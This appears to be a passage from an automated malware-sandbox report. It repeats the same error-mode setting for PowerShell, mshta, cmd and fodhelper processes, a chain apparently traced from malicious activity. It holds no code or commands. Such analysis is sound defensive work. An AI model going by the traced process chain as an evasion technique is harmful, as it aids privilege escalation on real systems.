          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
